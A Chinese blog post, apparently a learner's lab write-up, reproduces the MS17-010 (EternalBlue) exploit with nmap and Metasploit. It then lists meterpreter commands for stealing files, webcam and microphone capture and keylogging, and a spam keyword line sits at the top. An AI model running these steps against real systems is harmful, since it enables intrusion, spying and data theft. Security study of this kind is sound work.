国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

ms17-010(永恒之藍(lán)) 漏洞復(fù)現(xiàn)與處理

這篇具有很好參考價(jià)值的文章主要介紹了ms17-010(永恒之藍(lán)) 漏洞復(fù)現(xiàn)與處理。希望對大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

ms17-010(永恒之藍(lán)) 漏洞復(fù)現(xiàn)與處理

前言

ms17_010 是一種操作系統(tǒng)漏洞,僅影響 Windows 系統(tǒng)中的 SMBv1 服務(wù)。這個(gè)漏洞是由于 SMBv1 內(nèi)核函數(shù)中的緩沖區(qū)溢出而導(dǎo)致的。攻擊者可以通過該漏洞控制目標(biāo)系統(tǒng),并執(zhí)行任意代碼。這個(gè)漏洞通過 445 文件共享端口進(jìn)行利用,一旦攻擊者成功利用該漏洞,就可以在目標(biāo)主機(jī)上植入各種惡意軟件,如勒索軟件。最近出現(xiàn)的 WannaCry 勒索軟件就使用 ms17_010 漏洞來傳播和植入勒索代碼,將目標(biāo)系統(tǒng)中的所有文件加密并威脅用戶付款。由于該漏洞易受攻擊,且已經(jīng)公開和廣泛利用,因此建議 Windows 系統(tǒng)用戶及時(shí)進(jìn)行安全更新以避免被攻擊。對于其滲透測試相關(guān)應(yīng)用,可以使用 Metasploit 和其他滲透測試框架進(jìn)行利用和測試。今天就以該漏洞,作為我滲透學(xué)習(xí)的,第一次實(shí)例學(xué)習(xí)。

收集資產(chǎn)信息(Per-Engagement Interaction)

首先用nmap工具 收集該網(wǎng)絡(luò)所有網(wǎng)絡(luò)設(shè)備信息,從中找出可能帶有漏洞的設(shè)備

ms17-010,網(wǎng)絡(luò)安全專欄,網(wǎng)絡(luò),運(yùn)維,安全

以上信息可以看出該網(wǎng)段中我們可以看出

ip尾號:134、136開啟了445、139等端口,可能存在ms17_010漏洞

使用nmap深入掃描

nmap -A -sS -sV

-A為深度強(qiáng)力掃描能掃出是什么系統(tǒng)耗時(shí)較長,

-sS 為TCP連接中的SYN掃描,找出該主機(jī)已經(jīng)連接的tcp服務(wù) ,

-sV 為端口上的服務(wù)版本掃描

nmap更深層次的用法 是用腳本掃描使用 –script= 來表示,=后面寫腳本名。vnln是直接對漏洞進(jìn)行了掃描

nmap --script=vuln -A -sV -O

現(xiàn)在我們是要查目標(biāo)網(wǎng)段是否存在ms17_010漏洞,所以我們使用 –script=vuln 加ip -A -sV來掃描以上兩臺主機(jī),具體查一查它們究竟有沒有ms17_010漏洞

ms17-010,網(wǎng)絡(luò)安全專欄,網(wǎng)絡(luò),運(yùn)維,安全

該條列出了192.168.30.134主機(jī)系統(tǒng)的詳細(xì)情況和存在的漏洞情況,

文檔中指出該系統(tǒng)為windows server 2008 R2 系統(tǒng)
開啟DNS服務(wù)版本號為6.1.7601
IIS服務(wù)版本號為httpd7.5
我們和該系統(tǒng)的距離是1(以路由器為單位,距離1代表它就是我們的下一站)
以及該主機(jī)的MAC物理地址。
并把該系統(tǒng)的已用的TCP端口全部都暴露出來包括客戶端端口

發(fā)現(xiàn)了ms17_010漏洞。

ms17-010,網(wǎng)絡(luò)安全專欄,網(wǎng)絡(luò),運(yùn)維,安全

該條記錄中則描述了192.168.30.136主機(jī)系統(tǒng)的詳細(xì)情況和存在的漏洞情況,

從該記錄中我們可以看出,它是一個(gè)windows 7系統(tǒng)版本是2008|8.1版本,存在著ftp、PRC、NETBIOS、SMB等服務(wù),同時(shí)它也存在著ms17_010漏洞

此時(shí)我們的信息資產(chǎn)收集已經(jīng)完成,針對該信息資產(chǎn)開始下一步的滲透流程。

威脅建模(Information Gathering)

在該階段我們需要利用到Metasploit工具,Metasploit是一個(gè)非常強(qiáng)大的工具,同時(shí)它也是一款開源的軟件,開源就意味著可以免費(fèi)使用,它可以執(zhí)行廣泛的安全測試任務(wù),簡化了滲透的工作,它可以在windows、linux和Mac三端使用。

在使用這款軟件前我們先熟悉一下它的專業(yè)術(shù)語

  1. Exploit: 指針對漏洞的攻擊代碼,用來利用目標(biāo)計(jì)算機(jī)系統(tǒng)的弱點(diǎn),以獲取控制權(quán)或執(zhí)行任意代碼的權(quán)力。

  2. Payload: 指在攻擊被成功執(zhí)行后要運(yùn)行的代碼,可以是以個(gè)后門、惡意軟件或命令控制器等。

  3. Vulnerability: 表示存在的漏洞或弱點(diǎn),可能被攻擊者利用

  4. Module: 指metasploit框架中的代碼模塊,用于執(zhí)行各種功能,如掃描、攻擊、后滲透等。

  5. Encoder: 指對已存在的payload進(jìn)行加密以逃避防護(hù)或檢測。

  6. Auxiliary: 指matesploit編寫的相關(guān)輔助掃描模塊,如MYSQL掃描、SMB枚舉等

  7. Post-exploitation: 指攻擊成功后繼續(xù)擴(kuò)大入侵行為,如收集密碼、監(jiān)聽網(wǎng)絡(luò)流量等

  8. metepreter: 是Metasploit框架中最常用的shell,可以提供完整的控制臺,具有很強(qiáng)的功能。

  9. Session: 表示目標(biāo)計(jì)算機(jī)建立的會話,可以訪問受攻擊計(jì)算機(jī)的資源和數(shù)據(jù)

  10. Listener:指Metasploit框架用于監(jiān)聽反向shell或payload連接的組件

以上只是對matesploit簡要的介紹了常用的專業(yè)術(shù)語,如果要詳細(xì)了解這一工具還需要不斷的學(xué)習(xí)。

接下來我們就要使用該工具,進(jìn)行建模,在該工具去查找ms17_010的相關(guān)漏洞模塊驚醒攻擊

首先我們先進(jìn)入到matesploit工具中,在kali系統(tǒng)用我們可以使用msfconsole進(jìn)入msf控制臺

msfconsole

ms17-010,網(wǎng)絡(luò)安全專欄,網(wǎng)絡(luò),運(yùn)維,安全

該工具有一個(gè)特點(diǎn),每一次進(jìn)入它的圖像都會不一樣(我進(jìn)了10幾次,每次都不一樣不知道以后會不會有重復(fù)的)。

到這里我們就可以開始進(jìn)行漏洞查找了,使用命令search

search ms17_010

ms17-010,網(wǎng)絡(luò)安全專欄,網(wǎng)絡(luò),運(yùn)維,安全

在此我們可以看到有4個(gè)選項(xiàng)它們分別是對應(yīng)ms17_010的漏洞模塊:

  1. exploit/windows/smb/ms17_010_eternalblue
    該模塊用于利用MS17-010漏洞實(shí)現(xiàn)遠(yuǎn)程執(zhí)行代碼,可以覆蓋掉目標(biāo)計(jì)算機(jī)的內(nèi)存地址,從而實(shí)現(xiàn)攻擊者的惡意代碼在被攻擊計(jì)算機(jī)上的執(zhí)行。

  2. exploit/windows/smb/ms17_010_psexec

    該模塊使用PsExec登錄到目標(biāo)計(jì)算機(jī)的系統(tǒng)帳(NTAUTHORITY\SYSTEM)并實(shí)現(xiàn)命令執(zhí)行,需要在目標(biāo)計(jì)算機(jī)上存在管理共享。這個(gè)模塊和上面的模塊一樣是利用MS17-010漏洞。

  3. auxiliary/admin/smb/ms17_010_command

    該模塊用于發(fā)現(xiàn)被漏洞影響的 Windows主機(jī),以及執(zhí)行命令,可以通過提供的選項(xiàng)進(jìn)行數(shù)據(jù)包分析,或可選通道溢出使用,以獲得遠(yuǎn)程命令執(zhí)行的權(quán)限。

  4. auxiliary/scanner/smb/smb_ms17_010

    該模塊用于發(fā)現(xiàn)被漏洞影響的 Windows主機(jī),以及執(zhí)行命令,可以通過提供的選項(xiàng)進(jìn)行數(shù)據(jù)包分析,或可選通道溢出使用,以獲得遠(yuǎn)程命令執(zhí)行的權(quán)限。

exploit為攻擊模塊

auxiliary為輔助掃描模塊

大家注意到這個(gè)表格中的屬性一共有5項(xiàng),、

  • name:代表名字

  • disclosure:表示披露的時(shí)間

  • Rank : 表示模塊的可靠性分別對應(yīng)四級

    • “Excellent”:表示該模塊的效果非常好,準(zhǔn)確率較高,而且測試情況較廣泛,被認(rèn)為是最可靠的模塊。
    • “Great”:表示該模塊效果不錯(cuò),準(zhǔn)確率較高,但測試情況可能較少,被認(rèn)為是比較可靠的模塊。
    • “Normal”:表示該模塊效果一般,測試手段較單一,存在一定漏洞,可靠性較差。
    • “Average”:表示該模塊的效果一般,測試情況較少,被認(rèn)為是比較不可靠的模塊。
  • Check: 指的是該模塊是否支持漏洞檢測。

    • 模塊的check 為yes,那么使用該模塊可以先檢測目標(biāo)主機(jī)是否存在漏洞,以避免不必要的攻擊,
    • 模塊check 為No,它就只能用于攻擊或者利用漏洞,使用此類模塊時(shí)需格外小心,避免造成不必要的損失

? Description:它是描述漏洞或者模塊的詳細(xì)介紹。

以上我們粗略的了解了模塊的相關(guān)屬性。

現(xiàn)在威脅模型基本已經(jīng)完成,我們已經(jīng)找到該漏洞的相關(guān)模塊,接下來就是分析驗(yàn)證主機(jī)內(nèi)是否真的存在漏洞。

ms17-010,網(wǎng)絡(luò)安全專欄,網(wǎng)絡(luò),運(yùn)維,安全

漏洞分析(Threat Modeling)

在此階段我們選擇輔助掃描模塊,對漏洞進(jìn)行進(jìn)一步的確認(rèn)。

輸入命令

use 2

use auxiliary/admin/smb/ms17_010_command 

進(jìn)入3號輔助掃描模塊

ms17-010,網(wǎng)絡(luò)安全專欄,網(wǎng)絡(luò),運(yùn)維,安全

然后查看模塊配置,把相關(guān)重要配置補(bǔ)充使用命令

show options

ms17-010,網(wǎng)絡(luò)安全專欄,網(wǎng)絡(luò),運(yùn)維,安全

rhosts 是被攻擊方的IP 一定要設(shè)置,不設(shè)置這個(gè)誰都攻擊不了??

接下來我們來設(shè)置rhosts,輸入命令

set rhosts 被攻擊方IP(靶機(jī))

ms17-010,網(wǎng)絡(luò)安全專欄,網(wǎng)絡(luò),運(yùn)維,安全

此時(shí)我們就可以開始運(yùn)行模塊,愉快的檢測掃描了??

ms17-010,網(wǎng)絡(luò)安全專欄,網(wǎng)絡(luò),運(yùn)維,安全

ms17-010,網(wǎng)絡(luò)安全專欄,網(wǎng)絡(luò),運(yùn)維,安全

經(jīng)過重新的掃描檢測,最終確認(rèn)134、136兩臺主機(jī)都存在ms17_010漏洞??

準(zhǔn)備工作都做完了,接下來我們就可以開始正式的滲透攻擊了。

滲透攻擊(Vulnerability Analysis)

到了滲透攻擊這一階段,首先我們要吧matesploit模塊切換到攻擊模塊(exploit)

ms17-010,網(wǎng)絡(luò)安全專欄,網(wǎng)絡(luò),運(yùn)維,安全

使用命令

use 0

并重新設(shè)置show options.里面的rhosts

set RHOSTS 被攻擊方IP(靶機(jī)IP)

還有本地IP LHOST也要設(shè)置,LHOST是攻擊者和受害者之間連接必須要設(shè)置的,沒有正確的設(shè)置可能會導(dǎo)致攻擊失敗,甚至暴露攻擊者IP和位置信息。一般在工具里都會默認(rèn)設(shè)置為本機(jī)地址。

set LHOST 攻擊方IP	

ms17-010,網(wǎng)絡(luò)安全專欄,網(wǎng)絡(luò),運(yùn)維,安全

接下來就準(zhǔn)備攻擊,攻擊就是啟動(dòng)攻擊模塊命令為:

run 

ms17-010,網(wǎng)絡(luò)安全專欄,網(wǎng)絡(luò),運(yùn)維,安全

看到Win 就代表我們成功了,現(xiàn)在我們已經(jīng)滲透成功了,接下來就是后續(xù)的攻擊了

后滲透攻擊(Post Exploitation)

當(dāng)我們滲透攻擊成功后,可以做的事情就多了,例如:打開被攻擊方的攝像頭、查看被攻擊方的絕密資料、操控被攻擊方的計(jì)算機(jī),總而言之,攻破以后被攻擊方的電腦就是你的后花園,你想干嘛就干嘛。接下來我們看看具體實(shí)現(xiàn)這些操作的命令。

  1. 網(wǎng)絡(luò)命令

    ifconfig
    

    查看靶機(jī)的ip和網(wǎng)卡相關(guān)信息

    ms17-010,網(wǎng)絡(luò)安全專欄,網(wǎng)絡(luò),運(yùn)維,安全

    你可以在這里查看該主機(jī)是否還有其他網(wǎng)卡,能否通過它繼續(xù)深入滲透。

    arp
    

    查看靶機(jī)的arp表

    ms17-010,網(wǎng)絡(luò)安全專欄,網(wǎng)絡(luò),運(yùn)維,安全

    arp協(xié)議是一個(gè)非常重要的網(wǎng)絡(luò)層協(xié)議之一,有了這張表就可以清楚的知道該主機(jī)和那些主機(jī)有過連接,如果針對攻擊,也可以導(dǎo)致對方網(wǎng)絡(luò)癱瘓。

    netstat
    

    這個(gè)協(xié)議可以查看所有傳輸層的連接,TCP、UDP都可以查看。

    ms17-010,網(wǎng)絡(luò)安全專欄,網(wǎng)絡(luò),運(yùn)維,安全

    在這里可以查出所有和靶機(jī)有連接的程序,也是一個(gè)非常重要的表項(xiàng)

  2. 文件操作命令

    upload 
    

    上傳文件

    download
    

    下載文件

    ms17-010,網(wǎng)絡(luò)安全專欄,網(wǎng)絡(luò),運(yùn)維,安全

    通過這兩條命令,可以輕松的竊取主機(jī)數(shù)據(jù)資源。還有其他像cd、pwd、ls等命令基本和linux或windows指令相同,可以照搬使用

  3. 截圖和攝像頭命令

    screenshot
    

    截圖指令

    ms17-010,網(wǎng)絡(luò)安全專欄,網(wǎng)絡(luò),運(yùn)維,安全

    截取靶機(jī)正在運(yùn)行的界面截圖,使用得當(dāng)也是具有非常大的破壞力。

    webcom_list	
    

    查看攝像頭列表

    webcom_stream
    

    使用攝像頭進(jìn)行錄像

    webcom_snap
    

    使用攝像頭進(jìn)行拍照

    妥妥的個(gè)人隱私的暴露,攝像頭為什么不安全,我想大家現(xiàn)在應(yīng)該都明白了吧。

    由于本人設(shè)備沒有攝像頭就不在進(jìn)行截圖演示了,有想法的朋友可以自己試試。

    record_mic
    

    環(huán)境監(jiān)聽

    ms17-010,網(wǎng)絡(luò)安全專欄,網(wǎng)絡(luò),運(yùn)維,安全

    視頻都有了,那聲音的出現(xiàn)我也不意外,只是感慨電腦原來這么不安全。

    由于本人設(shè)備沒有mic(麥克風(fēng)),所以報(bào)錯(cuò)了,,

    keyscan_start
    

    獲取鍵盤記錄

     keyscan_dump
    

    轉(zhuǎn)換為字符

    說到這里,我想到的就是木馬,在以前木馬就是截取了鍵盤敲擊幾率實(shí)現(xiàn)盜號燈操作。

? 被滲透后的計(jì)算機(jī)真的是太可怕了,隱私毫無保留,而且我們什么都不知道,人家都是在悄無聲息的觀察你的生活,竊取你的重要數(shù)據(jù),在這里我只說了一小部分命令,還有更多,隱藏更深,破壞力更大的命令我沒有說,永恒之藍(lán)為什么能這么霸道,這就是它的底氣。

報(bào)告階段

今日認(rèn)認(rèn)真真的對ms17_010漏洞徹徹底底的學(xué)習(xí)了一遍,熟悉了Nmap、matesploit等工具的使用,并在本地實(shí)際的操作了一番,當(dāng)我操作完成后,更加的感覺網(wǎng)絡(luò)的可怕,如果沒有網(wǎng)安人員為我們保駕護(hù)航,我們幾乎就是全身赤裸的,暴露在這片廣域的網(wǎng)絡(luò)海洋中。至此也更加強(qiáng)了,我對網(wǎng)絡(luò)安全學(xué)習(xí)的欲望,每一次查閱資料、敲擊指令,我?guī)缀醵几杏X不到時(shí)間的流動(dòng),我只感覺是一瞬間的就到了晚上了?,F(xiàn)總結(jié)今天我收獲的知識。

  • . 在做滲透測試需要有7個(gè)階段

    1. 前期交互階段:

      • 主要收集目標(biāo)需求、準(zhǔn)備滲透計(jì)劃、定義滲透的范圍邊界、規(guī)劃滲透流程
    2. 情報(bào)收集階段:

      • 利用各種技術(shù)手段,收集滲透目標(biāo)的信息資產(chǎn),越全面越容易滲透成功
    3. 威脅建模階段:

      • 在收集到足夠的滲透目標(biāo)信息資產(chǎn)之后,對滲透的目標(biāo)開始建立滲透模型,需要解決的問題是如何達(dá)成滲透目的
    4. 漏洞分析階段:

      • 在確定了攻擊模型后,我們對滲透目標(biāo)的漏洞進(jìn)一步的分析確認(rèn),確認(rèn)滲透目標(biāo)的可操作性,找出真正的攻擊點(diǎn),如何繞過檢測、防火墻等防護(hù)設(shè)備。
    5. 滲透攻擊階段:

      • 此階段就是實(shí)質(zhì)性的入侵進(jìn)系統(tǒng),獲取系統(tǒng)的訪問權(quán),它是整個(gè)滲透過程的核心。
    6. 后滲透攻擊階段

      • 在這個(gè)階段是最能體現(xiàn)技術(shù)的階段,幾乎所有的攻擊行為都是在這一階段展開進(jìn)行,獲取目標(biāo)系統(tǒng)權(quán)限、竊取資源、竊聽目標(biāo)主機(jī)網(wǎng)絡(luò)流量等一些操作都是滲透技術(shù)的精髓所在。
    7. 報(bào)告階段文章來源地址http://www.zghlxwxcb.cn/news/detail-700358.html

      • 總結(jié)滲透的過程,存在了哪些漏洞,這些漏洞又要怎么去修復(fù),分析防御體系中存在的薄弱點(diǎn),需要如何去防范。它就是整個(gè)滲透過程的總結(jié)。

到了這里,關(guān)于ms17-010(永恒之藍(lán)) 漏洞復(fù)現(xiàn)與處理的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 永恒之藍(lán)ms17_010漏洞復(fù)現(xiàn)

    永恒之藍(lán)ms17_010漏洞復(fù)現(xiàn)

    攻擊機(jī):Linux kali(IP:192.168.52.132) 靶機(jī):Windows 7(x64)(IP:192.168.52.130) 條件:靶機(jī)防火墻關(guān)閉,兩臺機(jī)子能夠相互ping通,靶機(jī)445端口開啟(永恒之藍(lán)漏洞就是通過惡意代碼掃描并攻擊開放445端口的 Windows 主機(jī)) ? 登錄 kali linux,用 nmap 探測本網(wǎng)段存活主機(jī) nmap 192.168.5

    2024年02月11日
    瀏覽(19)
  • 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)

    永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)

    永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010) 環(huán)境 信息收集 先掃描目標(biāo)靶機(jī)IP 進(jìn)入MSF查看是否存在永恒之藍(lán)的漏洞 攻擊 攻擊機(jī):kali 靶機(jī):Windows Server 2008 對ip進(jìn)行收集開放什么端口 先掃描目標(biāo)靶機(jī)IP 因?yàn)樵谕粋€(gè)內(nèi)網(wǎng)之中 所以可以使用arp-scan -l 進(jìn)行查詢 知道目標(biāo)靶機(jī)IP(192.168.162.146)來進(jìn)

    2024年03月25日
    瀏覽(21)
  • 《MS17-010(永恒之藍(lán))—漏洞復(fù)現(xiàn)及防范》

    《MS17-010(永恒之藍(lán))—漏洞復(fù)現(xiàn)及防范》

    作者: susususuao 免責(zé)聲明:本文僅供學(xué)習(xí)研究,嚴(yán)禁從事非法活動(dòng),任何后果由使用者本人負(fù)責(zé)。 - 永恒之藍(lán) 永恒之藍(lán)(Eternal Blue)是一種利用Windows系統(tǒng)的SMB協(xié)議漏洞來獲取系統(tǒng)的最高權(quán)限,以此來控制被入侵的計(jì)算機(jī)。而SMB服務(wù)是一個(gè)協(xié)議名,它能被用于Web連接和客戶端與服

    2024年02月06日
    瀏覽(29)
  • MS17-010(永恒之藍(lán))漏洞分析與復(fù)現(xiàn)

    MS17-010(永恒之藍(lán))漏洞分析與復(fù)現(xiàn)

    一、漏洞簡介 1、永恒之藍(lán)介紹: 永恒之藍(lán)漏洞(MS17-010),它的爆發(fā)源于 WannaCry 勒索病毒的誕生,該病毒是不法分子利用NSA(National Security Agency,美國國家安全局)泄露的漏洞 “EternalBlue”(永恒之藍(lán))進(jìn)行改造而成 。勒索病毒的肆虐,儼然是一場全球性互聯(lián)網(wǎng)災(zāi)難,給廣

    2024年02月02日
    瀏覽(22)
  • 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級教程

    永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級教程

    攻擊機(jī): kali Linux?????????? ? 靶機(jī): win7 x64??? 提示:? 復(fù)現(xiàn)攻擊前請關(guān)閉殺毒軟件 ? 1.復(fù)現(xiàn)第一步按以下操作打開 445端口: 在 \\\"運(yùn)行\(zhòng)\\" 里輸入: regedit 打開注冊表編輯器????????????????????????????????????????????????????????????????????

    2023年04月08日
    瀏覽(21)
  • 【網(wǎng)絡(luò)安全】MS17-010“永恒之藍(lán)”漏洞的利用

    【網(wǎng)絡(luò)安全】MS17-010“永恒之藍(lán)”漏洞的利用

    導(dǎo)語 最近學(xué)期末進(jìn)行網(wǎng)絡(luò)安全實(shí)訓(xùn),老師要求每個(gè)小組選擇一個(gè)方向進(jìn)行研究,本篇將講述“永恒之藍(lán)”漏洞的簡單利用。 一、實(shí)驗(yàn)原理 Eternalblue通過TCP端口445和139來利用SMBv1和NBT中的遠(yuǎn)程代碼執(zhí)行漏洞,惡意代碼會掃描開放445文件共享端口的Windows機(jī)器,電腦只要開機(jī),攻

    2024年02月07日
    瀏覽(18)
  • 利用kali Linux復(fù)現(xiàn)永恒之藍(lán)(MS17-010)漏洞

    利用kali Linux復(fù)現(xiàn)永恒之藍(lán)(MS17-010)漏洞

    目錄 什么是永恒之藍(lán)? 永恒之藍(lán)漏洞原理 實(shí)驗(yàn)環(huán)境 操作前提 實(shí)驗(yàn)步驟 (1)復(fù)現(xiàn)成功后,執(zhí)行截圖命令 (2)對受害機(jī)器建立用戶,并且開啟受害機(jī)器的遠(yuǎn)程桌面并連接 永恒之藍(lán)是指2017年4月14日晚,黑客團(tuán)體Shadow Brokers(影子經(jīng)紀(jì)人)公布一大批網(wǎng)絡(luò)攻擊工具,其中包含“永恒

    2024年02月12日
    瀏覽(23)
  • MS17-010永恒之藍(lán)漏洞復(fù)現(xiàn)(手把手教程,超細(xì)!)

    MS17-010永恒之藍(lán)漏洞復(fù)現(xiàn)(手把手教程,超細(xì)!)

    0x00-聲明:小白一枚,寫下來為了記錄和學(xué)習(xí)交流,大神不喜勿噴。 0x01-思路:網(wǎng)段掃描—獲取IP—漏洞掃描—發(fā)現(xiàn)存在漏洞—攻擊拿shell—提權(quán) 目錄 一、環(huán)境搭建 ????????????????01 所需軟件:? 二、開始操作 ?01 kali 開始網(wǎng)段掃描 02 漏洞利用 03 提權(quán) 04 利用管理員用

    2023年04月09日
    瀏覽(21)
  • 復(fù)現(xiàn)永恒之藍(lán)[MS17_010]

    復(fù)現(xiàn)永恒之藍(lán)[MS17_010]

    目錄 準(zhǔn)備靶機(jī) 測試ping連通性 攻擊漏洞 利用漏洞 1臺kali,1臺win7 win7系統(tǒng)可以在MSDN鏡像網(wǎng)站里獲取 注:將win7安裝好,win7無法安裝vmtools,若升級系統(tǒng),可能會把永恒之藍(lán)補(bǔ)丁打上,所以建議別升級系統(tǒng) ? ? win7的IP地址為192.168.164.129 ?kali的IP地址為192.168.164.130 將這兩臺機(jī)器互

    2024年02月01日
    瀏覽(21)
  • 永恒之藍(lán)(ms17-010)簡介與復(fù)現(xiàn)

    永恒之藍(lán)(ms17-010)簡介與復(fù)現(xiàn)

    永恒之藍(lán)是指2017年4月14日晚,黑客團(tuán)體Shadow Brokers(影子經(jīng)紀(jì)人)公布一大批網(wǎng)絡(luò)攻擊工具,其中包含“永恒之藍(lán)”工具,“永恒之藍(lán)”利用Windows系統(tǒng)的SMB漏洞可以獲取系統(tǒng)最高權(quán)限。5月12日,不法分子通過改造“永恒之藍(lán)”制作了wannacry勒索病毒,英國、俄羅斯、整個(gè)歐洲

    2024年02月10日
    瀏覽(26)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包